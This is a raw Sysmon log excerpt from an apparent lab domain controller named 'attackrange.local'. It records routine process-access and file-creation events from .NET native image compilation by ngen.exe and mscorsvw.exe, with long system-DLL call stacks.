13:51:01.773{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9245-6005-3D04-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.757{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9245-6005-3D04-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:01.757{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9245-6005-3D04-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:01.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9245-6005-3C04-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.539{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9245-6005-3C04-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:01.539{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9245-6005-3C04-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:01.429{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\57c-0\System.EnterpriseServices.dll2021-01-18 13:51:01.429 11241100x80000000000000008520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:51:01.414{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\57c-0\System.EnterpriseServices.Wrapper.dll2021-01-18 13:51:01.414 10341000x80000000000000008519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:01.007{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9244-6005-3B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:03.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9247-6005-4104-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.976{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9247-6005-4104-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:03.976{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9247-6005-4104-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:03.710{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9247-6005-4004-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.695{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9247-6005-4004-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:03.695{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9247-6005-4004-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:03.632{59A5CD1D-9247-6005-3F04-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1050-0\System.IdentityModel.Selectors.dll2021-01-18 13:51:03.632 10341000x80000000000000008534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:03.507{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9247-6005-3F04-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.492{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9247-6005-3F04-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:03.492{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9247-6005-3F04-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:03.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9247-6005-3E04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.414{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9247-6005-3E04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:03.414{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9247-6005-3E04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:03.289{59A5CD1D-9245-6005-3D04-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1340-0\System.IdentityModel.dll2021-01-18 13:51:03.289 10341000x80000000000000008562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.960{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4704-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.945{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4704-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:04.945{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4704-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
